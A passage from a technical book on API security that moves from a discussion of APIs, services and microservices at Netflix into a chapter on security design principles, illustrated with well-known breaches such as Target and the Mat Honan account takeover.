implementation of an 33 Growth of Netflix API requests, https://gigaom.com/2012/05/15/ netflix-42-billion-api-requests/ 34 Top 10 Lessons Learned from the Netflix API, www.slideshare.net/danieljacobson/ top-10-lessons-learned-from-the-netflix-api-oscon-2014 35 How we use Zuul at Netflix, https://github.com/Netflix/zuul/wiki/ How-We-Use-Zuul-At-Netflix 36 Zuul, https://github.com/Netflix/zuul/wiki Chapter 1 apIs rule! 26 API that is exposed over SOAP is a SOAP service. Similarly, the implementation of an API that is exposed as JSON over HTTP is a RESTful service. Today, the topic, API vs. service, is debatable, as there are many overlapping areas. One popular definition is that an API is external facing, whereas a service is internal facing (see Figure 1-11). An enterprise uses an API whenever it wants to expose useful business functionality to the outside world through the firewall. This, of course, raises another question: why would a company want to expose its precious business assets to the outside world through an API? Twitter once again is the best example. It has a web site that allows users to log in and tweet from there. At the same time, anything that can be done through the web site can also be done via Twitter’s API. As a result, third parties develop applications against the Twitter API; there are mobile apps, browser plug-ins, and desktop apps. This has drastically reduced traffic to the Twitter web site. Even today, the web site doesn’t have a single advertisement (but as sponsored tweets on the usual twitter stream). If there was no public API, Twitter could easily have built an advertising platform around the web site, just as how Facebook did. However, having a public API helped to build a strong ecosystem around Twitter. Figure 1-11. API vs. service. An API is external facing Exposing corporate data via an API adds value. It gives access to the data, not just for corporate stakeholders but also for a larger audience. Limitless innovative ideas may pop up and, in the end, add value to the data. Say we have a pizza dealer with an API that returns the number of calories for a given pizza type and the size. You can develop an application to find out how many pizzas a person would have to eat per day to reach a body mass index (BMI) in the obesity range. Even though APIs are known to be public, it’s not a strict requirement. Most of the APIs started as public APIs and became the public face of the enterprise. At the same time, private APIs (not exposed to the public) proliferated within enterprises to share Chapter 1 apIs rule! 27 functionalities within it, between different components. In that case, the differentiator between an API and a service is not just its audience. In practice, most of the service implementations are exposed as APIs. In that case, API defines the contract between the service and the outside world (not necessarily public). Microservices is the most trending buzzword at the time of this writing. Everyone talks about microservices, and everyone wants to have microservices implemented. The term “microservice” was first discussed at a software architects workshop in Venice, in May 2011. It’s being used to explain a common architectural style they’ve been witnessing for some time. Later, after a year in May 2012, the same team agreed that the “microservice” is the best-suited term to call the previously discussed architectural style. At the same time, in March 2012, James Lewis went ahead and presented some of the ideas from the initial discussion in Venice at the 33rd Degree conference in Krakow, Poland.37 Note the abstract of James lewis’ talk on “Microservices – Java, the unix Way,” which happened to be the very first public talk on Microservices, in March 2012: “Write programs that do one thing and do it well. Write programs to work together” was accepted 40 years ago, yet we have spent the last decade building monolithic applications, communicating via bloated middleware and with our fingers crossed that Moore’s law keeps helping us out. there is a better way. Microservices. In this talk, we will discover a consistent and reinforcing set of tools and practices rooted in the unix philosophy of small and simple. tiny applications, communicating via the web’s uniform interface with single responsibilities and installed as well-behaved operating system services. so, are you sick of wading through tens of thousands of lines of code to make a simple one-line change? Of all that XMl? Come along and check out what the cool kids are up to (and the cooler gray beards). 37 Microservices – Java, the Unix Way, http://2012.33degree.org/talk/show/67 Chapter 1 apIs rule! 28 One can easily argue that a microservice is service-oriented architecture (SOA) done right. Most of the concepts we discussed today, related to microservices, are borrowed from SOA. SOA talks about an architectural style based on services. According to the Open Group definition, a service is a logical representation of a repeatable business activity that has a specified outcome and is self-contained, may be composed of other services; the implementation acts as a black box to the service consumers.38 SOA brings the much-needed agility to business to scale and interoperate. However, over the past, SOA became a hugely overloaded term. Some people defined SOA under the context of SOAP-based web services, and others used to think SOA is all about an enterprise service bus (ESB). This led Netflix to call microservices as fine-grained SOA, at the initial stage. I don’t really care whether it’s public or private. We used to call the things we were building on the cloud “cloud-native” or “fine-grained SOA,” and then the ThoughtWorks people came up with the word “microservices.” It’s just another name for what we were doing anyways, so we just started call- ing it microservices, as well.39 —Adrian Cockcroft, former cloud architect at Netflix NINE CHARACTERISTICS OF A MICROSERVICE Martin Fowler and James lewis, introducing microservices,40 identify nine characteristics in a well-designed microservice, as briefly explained in the following: Componentization via services: In microservices, the primary way of componentizing will be via services. this is a bit different from the traditional componentizing via libraries. a library in the Java world is a jar file, and in .Net world, it’s a Dll file. a library can be defined as a component isolated to perform some specific task and plugged into the main program via in-memory function calls. In microservices world, these libraries mostly act as a proxy to a remote service running out of process. 38 Service-Oriented Architecture Defined, www.opengroup.org/soa/source-book/togaf/ soadef.htm 39 Talking microservices with the man who made Netflix’s cloud famous, https://medium. com/s-c-a-l-e/talking-microservices-with-the-man-who-made-netflix-s-cloud-famous- 1032689afed3 40 Microservices, http://martinfowler.com/articles/microservices.html Chapter 1 apIs rule! 29 Organized around business capabilities: In most of the monolithic applications we see today, the layering is based on the technology not around the business capabilities. the user interface (uI) design team works on building the user interface for the application. they are the experts on htMl, Javascript, ajax, hCI (human-computer interaction), and many more. then we have database experts who take care of database schema design and various application integration technologies, like JDBC, aDO.Net, and hibernate. then we have server-side logic team who write the actual business logic and also are the experts on Java, .Net, and many more server-side technologies. With the microservices approach, you build cross-functional, multidisciplined teams around business capabilities. Products not projects: the objectives of a project team are to work according to a project plan, meet the set deadlines, and deliver the artifacts at the end of the project. Once the project is done, the maintenance team takes care of managing the project from there onward. It is estimated that 29% of an It budget is spent on new system development, while 71% is spent on maintaining existing systems and adding capacity to those systems.41 to avoid such wastage and to improve the efficiency throughout the product lifecycle, amazon introduced the concept—you build it, you own it. the team, which builds the product, will own it forever. this brought in the product mentality and made the product team responsible for a given business functionality. Netflix, one of the very early promoters of microservices, treats each of their apI as a product. Smart endpoints and dumb pipes: each microservice is developed for a well-defined scope. Once again, the best example is Netflix.42 Netflix started with a single monolithic web application called netflix.war in 2008, and later in 2012, as a solution to address vertical scalability concerns, they moved into a microservices-based approach, where they have hundreds of fine-grained microservices today. the challenge here is how microservices talk to each other. since the scope of each microservice is small (or micro), to accomplish a given business requirement, microservices have to talk to each other. each microservice would be a smart endpoint, which exactly knows how to process an incoming request and generate the response. the communication channels between microservices act as dumb pipes. this is similar to the unix pipes and filters architecture. For example, the ps –ax command in unix will list out the status of currently running processes. the grep unix command will search 41 You build it, You run it, www.agilejourneyman.com/2012/05/you-build-it-you-run-it.html 42 Microservice at Netflix, www.youtube.com/watch?v=LEcdWVfbHvc Chapter 1 apIs rule! 30 any given input files, selecting lines that match one or more patterns. each command is smart enough to do their job. We can combine both the commands with a pipe. For example, ps –ax | grep 'apache' will only list out the processes that matches the search criteria ‘apache’. here the pipe (|) acts as dumb—which basically takes the output from the first command and hands it over to the other. this is one of the main characteristics of a microservice design. Decentralized governance: Most of the sOa deployments follow the concept of centralized governance. the design time governance and the runtime governance are managed and enforced centrally. the design time governance will look into the aspects such as whether the services passed all the unit tests, integration tests, and coding conventions, secured with accepted security policies and many more, before promoting from the developer phase to the Qa (quality assurance) phase. In a similar way, one can enforce more appropriate checklists to be evaluated before the services are promoted from Qa to staging and from staging to production. the runtime governance will worry about enforcing authentication policies, access control policies, and throttling policies in the runtime. With the microservices-based architecture, each service is designed with its own autonomy and highly decoupled from each other. the team behind each microservice can follow their own standards, tools, and protocols. this makes a decentralized governance model more meaningful for microservices architecture. Decentralized data management: In a monolithic application, all the components in it talk to a single database. With the microservices design, where each distinguished functional component is developed into a microservice, based on their business capabilities, will have its own database—so each such service can scale end to end without having any dependency on other microservices. this approach can easily add overhead in distributed transaction management, as data resides in multiple heterogeneous database management systems. Infrastructure automation: Continuous deployment and continuous delivery are two essential ingredients in infrastructure automation. Continuous deployment extends continuous delivery and results in every build that passes automated test gates being deployed into production, while with continuous delivery, the decision to deploy into the production setup is taken based on the business need.43 Netflix, one of the pioneers in apIs and microservices, follows the former approach, the continuous deployment. With the continuous deployment, the new features need not be sitting on a shelf. Once they have gone through and passed all the 43 Deploying the Netflix API, http://techblog.netflix.com/2013/08/deploying- netflix-api.html Chapter 1 apIs rule! 31 tests, they are ready to be deployed in production. this also avoids deploying a large set of new features at one go, hence doing minimal changes to the current setup and the user experience. Infrastructure automation does not have a considerable difference between monolithic applications and microservices. Once the infrastructure is ready, it can be used across all the microservices. Design for failure: the microservices-based approach is a highly distributed setup. In a distributed setup, failures are inevitable. No single component can guarantee 100% uptime. any service call may fail due to various reasons: the transport channel between the services could be down, the server instance which hosts the service may be down, or even the service itself may be down. this is an extra overhead on microservices, compared to monolithic applications. each microservice should be designed in a way to handle and tolerate these failures. In the entire microservices architecture, the failure of one service should ideally have zero or minimal impact on the rest of the running services. Netflix developed a set of tools called simian army,44 based on the success of its Chaos Monkey, to simulate failure situations under a controlled environment to make sure the system can gracefully recover. Evolutionary design: the microservices architecture inherently supports the evolutionary design. unlike in monolithic applications, with microservices the cost of upgrading or replacing an individual component is extremely low, since they’ve been designed to function independently or in a loosely coupled manner. Netflix is one of the pioneers in microservices adoption. Not just Netflix, General Electric (GE), Hewlett-Packard (HP), Equinox Inc, PayPal, Capital One Financial Corp, Goldman Sachs Group Inc, Airbnb, Medallia, Square, Xoom Corp, and many more are early adopters of microservices.45 Even though microservices became a buzzword quite recently, some of the design principles brought forward by the microservices architecture were there for some time. It’s widely believed that Google, Facebook, and Amazon were using microservices internally for several years—when you do a Google search, it calls out roughly 70 microservices before returning back the results. Just like in the case of API vs. service, the differentiator between an API and a microservice also relies on the audience. APIs are known to be public facing, while microservices are used internally. Netflix, for example, has hundreds of microservices, 44 The Netflix Simian Army, http://techblog.netflix.com/2011/07/netflix-simian-army.html 45 Innovate or Die: The Rise of Microservices, http://blogs.wsj.com/cio/2015/10/05/ innovate-or-die-the-rise-of-microservices/ Chapter 1 apIs rule! 32 but none of them are exposed outside. The Netflix API still acts as their public-facing interface, and there is a one-to-many relationship between the Netflix API and its microservices. In other words, one API could talk to multiple microservices to cater a request generated by one of the devices supported by Netflix. Microservices have not substituted APIs—rather they work together. Summary • The API adoption has grown rapidly in the last few years, and almost all the cloud service providers today expose public managed APIs. • In contrast to naked APIs, the managed APIs are secured, throttled, versioned, and monitored. • An API store (or a developer portal), API publisher, and API gateway are the three key ingredients in building an API management solution. • Lifecycle management is a key differentiator between a naked API and a managed API. A managed API has a lifecycle from its creation to its retirement. A typical API lifecycle might flow through Created, Published, Deprecated, and Retired stages. • Microservices have not substituted APIs—rather they work together. Chapter 1 apIs rule! 33 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_2 CHAPTER 2 Designing Security for APIs Just a few days after everyone celebrated Thanksgiving Day in 2013, someone who fooled the Target defense system installed a malware in its security and payment system. It was the peak time in business for any retailer in the United States. While the customers were busy in getting ready for Christmas, the malware which was sitting in the Target payment system silently captured all the credit card information from the cashier’s terminal and stored them in a server, which was under the control of the attacker. Forty million credit card numbers were stolen in this way from 1797 Target stores around the country.1 It was a huge breach of trust and credibility from the retailer, and in March 2015 a federal judge in St. Paul, Minnesota, approved a $10 million offer by Target to settle the lawsuit against the data breach.2 Not just Target or the retail industry but as a whole, the cybercrime has gained a lot of momentum in the last few years. Figure 2-1 shows the annual number of data breaches and exposed records in the United States from 2005 to 2018. The attack on Dyn DNS in 2016 was one of the largest DDoS (distributed denial of service) attacks that took many large Internet services down for several hours. Then in February 2018, the largest recorded DDoS attack happened against GitHub. More than 1.35 terabits per second of traffic hit the developer platform GitHub all at once.3 1 Target Credit Card Hack, http://money.cnn.com/2013/12/22/news/companies/ target-credit-card-hack/ 2 Target Data Hack Settlement, http://money.cnn.com/2015/03/19/technology/security/ target-data-hack-settlement/ 3 GitHub Survived the Biggest DDoS Attack Ever Recorded, www.wired.com/story/ github-ddos-memcached/ 34 Identity Theft Resource Center4 defines a data breach as the loss of information from computers or storage media that could potentially lead to identity theft, including social security numbers, bank account details, driving license numbers, and medical information. The most worrisome fact is that, according to an article5 by The Economist magazine, the average time between an attacker breaching a network and its owner noticing the intrusion is 205 days. Trinity of Trouble Connectivity, extensibility, and complexity are the three trends behind the rise of data breaches around the globe in the last few years. Gary McGraw in his book, Software Security,6 identifies these three trends as the trinity of trouble. Figure 2-1. Annual number of data breaches and exposed records in the United States from 2005 to 2018 (in millions), Statistica, 2019 4 Identity Theft Resource Center, www.idtheftcenter.org/ 5 The cost of immaturity, www.economist.com/news/business/21677639-business-protecting- against-computer-hacking-booming-cost-immaturity 6 Gary McGraw, Software Security: Building Security In, Addison-Wesley Publisher Chapter 2 Designing seCurity for apis 35 APIs play a major role in connectivity. As we discussed in detail, in Chapter 1, we live in a world today where almost everything is connected with each other. Connectivity exposes many paths of exploitation for attackers, which never existed before. Login to Yelp, Foursquare, Instagram, and many more via Facebook means an attacker only needs to worry about compromising one’s Facebook account to get access to his/her all other connected accounts. FACEBOOK DATA BREACH ~ SEPTEMBER 2018 in september 2018, facebook team figured out an attack,7 which put the personal information of more than 50 million facebook users at risk. the attackers exploited multiple issues on facebook code base around the View as feature and got hold of oauth 2.0 access tokens that belong to more than 50 million users. access token is some kind of a temporary token or a key, which one can use to access a resource on behalf of someone else. say, for example, if i want to share my photos uploaded to instagram on my facebook wall, i would give an access token corresponding to my facebook wall, which i obtained from facebook, to instagram. now, at each time when i upload a photo to instagram, it can use the access token to access my facebook account and publish the same on my facebook wall using the facebook api. even though instagram can post photos on my facebook wall using the provided access token, it cannot do anything else other than that. for example, it cannot see my friend list, cannot delete my wall posts, or read my messages. also, this is usually what happens when you log in to a third-party application via facebook; you simply share an access token corresponding to your facebook account with the third-party web application, so the third-party web application can use the access token to access the facebook api to know more about you. In a connected enterprise, not just the applications developed with modern, bleeding edge technology get connected but also the legacy systems. These legacy systems may not support latest security protocols, even Transport Layer Security (TLS) for securing data in transit. Also, the libraries used in those systems could have many well-known security vulnerabilities, which are not fixed due to the complexities in upgrading to the latest versions. All in all, a connected system, not planned/designed quite well, could easily become a security graveyard. 7 What Went Wrong?, https://medium.facilelogin.com/what-went-wrong-d09b0dc24de4 Chapter 2 Designing seCurity for apis 36 Most of the enterprise software are developed today with great extensibility. Extensibility over modification is a well-known design philosophy in the software industry. It talks about building software to evolve with new requirements, without changing or modifying the current source code, but having the ability to plug in new software components to the current system. Google Chrome extensions and Firefox add-ons all follow this concept. The Firefox add-on, Modify Headers, lets you add, modify, and filter the HTTP request headers sent to web servers. Another Firefox add- on, SSO Tracer, lets you track all the message flows between identity providers and service providers (web applications), via the browser. None of these are harmful—but, then again, if an attacker can fool you to install a malware as a browser plugin, it could easily bypass all your browser-level security protections, even the TLS, to get hold of your Facebook, Google, Amazon, or any other web site credentials. It’s not just about an attacker installing a plugin into the user’s browser, but also when there are many extensions installed in your browser, each one of them expands the attack surface. Attackers need not write new plugins; rather they can exploit security vulnerability in an already installed plugin. THE STORY OF MAT HONAN it was a day in august 2012. Mat honan, a reporter for Wired magazine, san francisco, returned home and was playing with his little daughter.8 he had no clue what was going to happen next. suddenly his iphone was powered down. he was expecting a call—so he plugged it into a wall power socket and rebooted back. What he witnessed next blew him away. instead of the iphone home screen with all the apps, it asked for him to set up a new phone with a big apple logo and a welcome screen. honan thought his iphone was misbehaving—but was not that worried since he backed up daily to the iCloud. restoring everything from iCloud could simply fix this, he thought. honan tried to log in to iCloud. tried once—failed. tried again—failed. again—failed. thought he was excited. tried once again for the last time, and failed. now he knew something weird has happened. his last hope was his MacBook. thought at least he could restore everything from the local backup. Booted up the MacBook and found nothing in it—and it prompted him to enter a four-digit passcode that he has never set up before. 8 How Apple and Amazon Security Flaws Led to My Epic Hacking, www.wired.com/2012/08/ apple-amazon-mat-honan-hacking Chapter 2 Designing seCurity for apis 37 honan called apple tech support to reclaim his iCloud account. then he learned he has called apple, 30 minutes before, to reset his iCloud password. the only information required at that time to reset an iCloud account was the billing address and the last four digits of the credit card. the billing address was readily available under the whois internet domain record honan had for his personal web site. the attacker was good enough to get the last four digits of honan’s credit card by talking to amazon helpdesk; he already had honan’s email address and the full mailing address—those were more than enough for a social engineering attack. honan lost almost everything. the attacker was still desperate—next he broke into honan’s gmail account. then from there to his twitter account. one by one—honan’s connected identity falls into the hands of the attacker. The complexity of the source code or the system design is another well-known source of security vulnerabilities. According to a research, after some point, the number of defects in an application goes up as the square of the number of the lines of code.9 At the time of this writing, the complete Google codebase to run all its Internet services was around 2 billion lines of code, while Microsoft Windows operating system had around 50 million lines of code.10 As the number of lines of code goes high, the number of tests around the code should grow as well, to make sure that none of the existing functionalities are broken and the new code works in the expected way. At Nike, 1.5 million lines of test code is run against 400,000 lines of code.11 Design Challenges Security isn’t an afterthought. It has to be an integral part of any development project and also for APIs. It starts with requirements gathering and proceeds through the design, development, testing, deployment, and monitoring phases. Security brings a plethora of challenges into the system design. It’s hard to build a 100% secured system. The only thing you can do is to make the attacker’s job harder. This is in fact the philosophy followed while designing cryptographic algorithms. The following discusses some of the key challenges in a security design. 9 Encapsulation and Optimal Module Size, www.catb.org/esr/writings/taoup/html/ ch04s01.html 10 Google Is 2 Billion Lines of Code, www.catb.org/esr/writings/taoup/html/ch04s01.html 11 Nike’s Journey to Microservices, www.youtube.com/watch?v=h30ViSEZzW0 Chapter 2 Designing seCurity for apis 38 MD5 MD512 algorithm (an algorithm for message hashing), which was designed in 1992, was accepted to be a strong hashing algorithm. one of key attributes of a hashing algorithm is, given the text, the hash corresponding to that text can be generated, but, given a hash, the text corresponding to the hash cannot be derived. in other words, hashes are not reversible. if the text can be derived from a given hash, then that hashing algorithm is broken. the other key attribute of a hashing algorithm is that it should be collision-free. in other words, any two distinct text messages must not result in the same hash. the MD5 design preserved both of these two properties at the time of its design. With the available computational power, it was hard to break MD5 in the early 1990s. as the computational power increased and it was made available to many people via cloud-based infrastructure as a service (iaas) providers, like amazon, MD5 was proven to be insecure. on March 1, 2005, arjen Lenstra, Xiaoyun Wang, and Benne de Weger demonstrated that MD5 is susceptible to hash collisions.13 User Experience The most challenging thing in any security design is to find and maintain the right balance between security and the user comfort. Say you have the most complex password policy ever, which can never be broken by any brute-force attack. A password has to have more than 20 characters, with mandatory uppercase and lowercase letters, numbers, and special characters. Who on Earth is going to remember their passwords? Either you’ll write it on a piece of paper and keep it in your wallet, or you’ll add it as a note in your mobile device. Either way, you lose the ultimate objective of the strong password policy. Why would someone carry out a brute-force attack when the password is written down and kept in a wallet? The principle of psychological acceptability, discussed later in this chapter, states that security mechanisms should not make the resource more difficult to access than if the security mechanisms were not present. We have few good examples from the recent past, where user experience drastically improved while keeping security intact. Today, with the latest Apple Watch, you can unlock your MacBook, without retyping the password. Also the face recognition 12 RFC 6156: The MD5 Message-Digest Algorithm, https://tools.ietf.org/html/rfc1321 13 Colliding X.509 Certificates, http://eprint.iacr.org/2005/067.pdf Chapter 2 Designing seCurity for apis 39 technology introduced in the latest iPhones lets you unlock the phone, just by looking at it. You never even notice that the phone was locked. It is essential that the human interface be designed for ease of use, so that users routinely and automatically apply the protection mechanisms cor- rectly. Also, to the extent that the user's mental image of his protection goals matches the mechanisms he must use, mistakes will be minimized. If he must translate his image of his protection needs into a radically different specification language, he will make errors. —Jerome Saltzer and Michael Schroeder Performance Performance is another key criterion. What is the cost of the overhead you add to your business operations to protect them from intruders? Say you have an API secured with a key, and each API call must be digitally signed. If the key is compromised, an attacker can use it to access the API. How do you minimize the impact? You can make the key valid only for a very short period; so, whatever the attacker can do with the stolen key is limited to its lifetime. What kind of impact will this have on legitimate day-to-day business operations? Each client application should first check the validity period of the key (before doing the API call) and, if it has expired, make a call to the authorization server (the issuer of the key) to generate a new key. If you make the lifetime too short, then almost for each API call, there will be a call to the authorization server to generate a new key. That kills performance—but drastically reduces the impact of an intruder getting access to the API key. The use of TLS for transport-level security is another good example. We will be discussing TLS in Appendix C, in detail. TLS provides protection for data in transit. When you pass your login credentials to Amazon or eBay, those are passed over a secured communication channel, or HTTP over TLS, which is in fact the HTTPS. No one in the middle will be able to see the data passed from your browser to the web server (assuming there is no room for a man-in-the-middle attack). But this comes at a cost. TLS adds more overhead over the plain HTTP communication channel, which would simply slow down things a bit. For the exact same reason, some enterprises follow the strategy where all of the communication channels open to the public are over HTTPS, while the communication between internal servers are over plain HTTP. They make sure Chapter 2 Designing seCurity for apis 40 no one can intercept any of those internal channels by enforcing strong network-level security. The other option is to use optimized hardware to carry out the encryption/ decryption process in the TLS communication. Doing encryption/decryption process at the dedicated hardware level is far more cost-effective than doing the same at the application level, in terms of performance. Even with TLS, the message is only protected while it is in transit. As soon as the message leaves the transport channel, it’s in cleartext. In other words, the protection provided by TLS is point to point. When you log in to your banking web site from the browser, your credentials are only secured from your browser to the web server at your bank. If the web server talks to a Lightweight Directory Access Protocol (LDAP) server to validate the credentials, once again if this channel is not explicitly protected, then the credentials will be passed in cleartext. If anyone logs all the in and out messages to and from the bank’s web server, then your credentials will be logged in plaintext. In a highly secured environment, this may not be acceptable. Using message-level security over transport-level security is the solution. With message-level security, as its name implies, the message is protected by itself and does not rely on the underlying transport for security. Since this has no dependency on the transport channel, the message will be still protected, even after it leaves the transport. This once again comes at a high performance cost. Using message-level protection is much costlier than simply using TLS. There is no clear-cut definition on making a choice between the security and the performance. Always there is a compromise, and the decision has to be taken based on the context. Weakest Link A proper security design should care about all the communication links in the system. Any system is no stronger than its weakest link. In 2010, it was discovered that since 2006, a gang of robbers equipped with a powerful vacuum cleaner had stolen more than 600,000 euros from the Monoprix supermarket chain in France.14 The most interesting thing was the way they did it. They found out the weakest link in the system and attacked it. To transfer money directly into the store’s cash coffers, cashiers slid tubes filled with 14 “Vacuum Gang” Sucks Up $800,000 From Safeboxes, https://gizmodo.com/ vacuum-gang-sucks-up-800-000-from-safeboxes-5647047 Chapter 2 Designing seCurity for apis 41 money through pneumatic suction pipes. The robbers realized that it was sufficient to drill a hole in the pipe near the trunk and then connect a vacuum cleaner to capture the money. They didn’t have to deal with the coffer shield. Not always, the weakest link in a system is either a communication channel or an application. There are many examples which show the humans have turned out to be the weakest link. The humans are the most underestimated or the overlooked entity in a security design. Most of the social engineering attacks target humans. In the famous Mat Honan’s attack, calling to an Amazon helpdesk representative, the attacker was able to reset Mat Honan’s Amazon credentials. The October 2015 attack on CIA Director John Brennan’s private email account is another prime example of social engineering.15 The teen who executed the attack said, he was able to fool a Verizon worker to get Brennan’s personal information and duping AOL into resetting his password. The worst side of the story is that Brennan has used his private email account to hold officially sensitive information—which is again a prime example of a human being the weakest link of the CIA defense system. Threat modeling is one of the techniques to identify the weakest links in a security design. Defense in Depth A layered approach is preferred for any system being tightened for security. This is also known as defense in depth. Most international airports, which are at a high risk of terrorist attacks, follow a layered approach in their security design. On November 1, 2013, a man dressed in black walked into the Los Angeles International Airport, pulled a semi-automatic rifle out of his bag, and shot his way through a security checkpoint, killing a TSA screener and wounding at least two other officers.16 This was the first layer of defense. In case someone got through it, there has to be another to prevent the gunman from entering a flight and taking control. If there had been a security layer before the TSA, maybe just to scan everyone who entered the airport, it would have detected the weapon and probably saved the life of the TSA officer. NSA (National Security Agency of the United States) identifies defense in depth as a practical strategy for achieving information assurance in today’s highly networked 15 Teen says he hacked CIA director’s AOL account, http://nypost.com/2015/10/18/ stoner-high-school-student-says-he-hacked-the-cia/ 16 Gunman kills TSA screener at LAX airport, https://wapo.st/2QBfNoI Chapter 2 Designing seCurity for apis 42 environments.17 It further explains layered defense under five classes of attack: passive monitoring of communication channels, active network attacks, exploitation of insiders, close-in attacks, and attacks through various distribution channels. The link and network layer encryption and traffic flow security is proposed as the first line of defense for passive attacks, and the second line of defense is the security-enabled applications. For active attacks, the first line of defense is the enclave boundaries, while the second line of defense is the computing environment. The insider attacks are prevented by having physical and personnel security as the first line of defense and having authentication, authorization, and audits as the second line of defense. The close-in attacks are prevented by physical and personnel security as the first layer and having technical surveillance countermeasures as the second line of defense. Adhering to trusted software development and distribution practices and via runtime integrity controls prevents the attacks via multiple distributed channels. The number of layers and the strength of each layer depend on which assets you want to protect and the threat level associated with them. Why would someone hire a security officer and also use a burglar alarm system to secure an empty garage? Insider Attacks Insider attacks are less complicated, but highly effective. From the confidential US diplomatic cables leaked by WikiLeaks to Edward Snowden’s disclosure about the National Security Agency’s secret operations, all are insider attacks. Both Snowden and Bradley Manning were insiders who had legitimate access to the information they disclosed. Most organizations spend the majority of their security budget to protect their systems from external intruders; but approximately 60% to 80% of network misuse incidents originate from inside the network, according to the Computer Security Institute (CSI) in San Francisco. There are many prominent insider attacks listed down in the computer security literature. One of them was reported in March 2002 against the UBS Wealth Management firm in the United States. UBS is a global leader in wealth management having branches over 50 countries. Roger Duronio, one of the system administrators at UBS, found guilty of computer sabotage and securities fraud for writing, planting, and disseminating malicious code that took down up to 2000 servers. The US District Court in Newark, 17 Defense in Depth, www.nsa.gov/ia/_files/support/defenseindepth.pdf Chapter 2 Designing seCurity for apis 43 New Jersey, sentenced him for 97 months in jail.18 The Target data breach that we discussed at the beginning of the chapter is another prime example for an insider attack. In that case, even the attackers were not insiders, they gained access to the Target internal system using the credentials of an insider, who is one of the company’s refrigeration vendors. According to an article by Harvard Business Review (HBR),19 at least 80 million insider attacks take place in the United States each year. HBR further identifies three causes for the growth of insider attacks over the years: • One is the dramatic increase in the size and the complexity of IT. As companies grow in size and business, a lot of isolated silos are being created inside. One department does not know what the other does. In 2005 call center staffers based in Pune, India, defrauded four Citibank account holders in New York of nearly $350,000, and later it was found those call center staffers are outsourced employees of Citibank itself and had legitimate access to customers’ PINs and account numbers. • The employees who use their own personal devices for work are another cause for the growing insider threats. According to a report released by Alcatel-Lucent in 2014, 11.6 million mobile devices worldwide are infected at any time.20 An attacker can easily exploit an infected device of an insider to carry out an attack against the company. • The third cause for the growth of insider threats, according to the HBR, is the social media explosion. Social media allow all sorts of information to leak from a company and spread worldwide, often without the company’s knowledge. Undoubtedly, insider attacks are one of the hardest problems to solve in a security design. These can be prevented to some extent by adopting robust insider policies, raising awareness, doing employee background checks at the point of hiring them, 18 UBS insider attack, www.informationweek.com/ex-ubs-systems-admin-sentenced-to- 97-months-in-jail/d/d-id/1049873 19 The Danger from Within, https://hbr.org/2014/09/the-danger-from-within 20 Surge in mobile network infections in 2013, http://phys.org/news/2014-01-surge-mobile- network-infections.html Chapter 2 Designing seCurity for apis 44 enforcing strict processes and policies on subcontractors, and continuous monitoring of employees. In addition to these, SANS Institute also published a set of guidelines in 2009 to protect organizations from insider attacks.21 Note insider attacks are identified as a growing threat in the military. to address this concern, the us Defense advanced research projects agency (Darpa) launched a project called Cyber insider threat (CinDer) in 2010. the objective of this project was to develop new ways to identify and mitigate insider threats as soon as possible. Security by Obscurity Kerckhoffs’ principle22 emphasizes that a system should be secured by its design, not because the design is unknown to an adversary. One common example of security by obscurity is how we share door keys between family members, when there is only a single key. Everyone locks the door and hides the key somewhere, which is known to all the other family members. The hiding place is a secret, and it is assumed only family members know about it. In case if someone can find the hiding place, the house is no more secured. Another example for security by obscurity is Microsoft’s NTLM (an authentication protocol) design. It was kept secret for some time, but at the point (to support interoperability between Unix and Windows) Samba engineers reverse-engineered it, they discovered security vulnerabilities caused by the protocol design itself. Security by obscurity is widely accepted as a bad practice in computer security industry. However, one can argue it as another layer of security before someone hits the real security layer. This can be further explained by extending our first example. Let’s say instead of just hiding the door key somewhere, we put it to a lock box and hide it. Only the family members know the place where the lock box is hidden and also the key combination to 21 Protecting Against Insider Attacks, www.sans.org/reading-room/whitepapers/incident/ protecting-insider-attacks-33168 22 In 1883, Auguste Kerckhoffs published two journal articles on La Cryptographie Militaire in which he emphasized six design principles for military ciphers. This resulted in the well-known Kerckhoffs’ principle: A cryptosystem should be secured even if everything about the system, except the key, is public knowledge. Chapter 2 Designing seCurity for apis 45 open the lock box. The first layer of defense is the location of the box, and the second layer is the key combination to open the lock box. In fact in this case, we do not mind anyone finding the lock box, because finding the lock box itself is not sufficient to open the door. But, anyone who finds the lock box can break it to get the key out, rather than trying out the key combination. In that case, security by obscurity adds some value as a layer of protection—but it’s never good by its own. Design Principles Jerome Saltzer and Michael Schroeder produced one of the most widely cited research papers in the information security domain.23 According to the paper, irrespective of the level of functionality provided, the effectiveness of a set of protection mechanisms depends upon the ability of a system to prevent security violations. In most of the cases, building a system at any level of functionality that prevents all unauthorized actions has proved to be extremely difficult. For an advanced user, it is not hard to find at least one way to crash a system, preventing other authorized users accessing the system. Penetration tests that involved a large number of different general-purpose systems have shown that users can build programs to obtain unauthorized access to information stored within. Even in systems designed and implemented with security as a top priority, design and implementation flaws could provide ways around the intended access restrictions. Even though the design and construction techniques that could systematically exclude flaws are the topic of much research activity, according to Jerome and Michael, no complete method applicable to the construction of large general-purpose systems existed during the early 1970s. In this paper, Jerome Saltzer and Michael Schroeder further highlight eight design principles for securing information in computer systems, as described in the following sections. Least Privilege The principle of least privilege states that an entity should only have the required set of permissions to perform the actions for which they are authorized, and no more. Permissions can be added as needed and should be revoked when no longer in use. 23 The Protection of Information in Computer Systems, http://web.mit.edu/Saltzer/www/ publications/protection/, October 11, 1974. Chapter 2 Designing seCurity for apis 46 This limits the damage that can result from an accident or error. The need to know principle, which follows the least privilege philosophy, is popular in military security. This states that even if someone has all the necessary security clearance levels to access information, they should not be granted access unless there is a real/proven need. Unfortunately, this principle didn’t apply in the case of Edward Snowden,24 or he was clever enough to work around it. Edward Snowden who worked for NSA (National Security Agency of the United States) as a contractor in Hawaii used unsophisticated techniques to access and copy an estimated 1.7 million classified NSA files. He was an employee of NSA and had legitimate access to all the information he downloaded. Snowden used a simple web crawler, similar to Google’s Googlebot (which collects documents from the Web to build a searchable index for the Google Search engine), to crawl and scrape all the data from NSA’s internal wiki pages. Being a system administrator, Snowden’s role was to back up the computer systems and move information to local servers; he had no need to know the content of the data. ISO 27002 (formerly known as ISO 17799) also emphasizes on the least privilege principle. ISO 27002 (Information Technology - Code of Practice for Information Security Management) standard is a well-known, widely used standard in the information security domain. It was originally developed by the British Standards Institution and called the BS7799 and subsequently accepted by the International Organization for Standardization (ISO) and published under their title in December 2000. According to ISO 27002, privileges should be allocated to individuals on a need-to-use basis and on an event-by-event basis, that 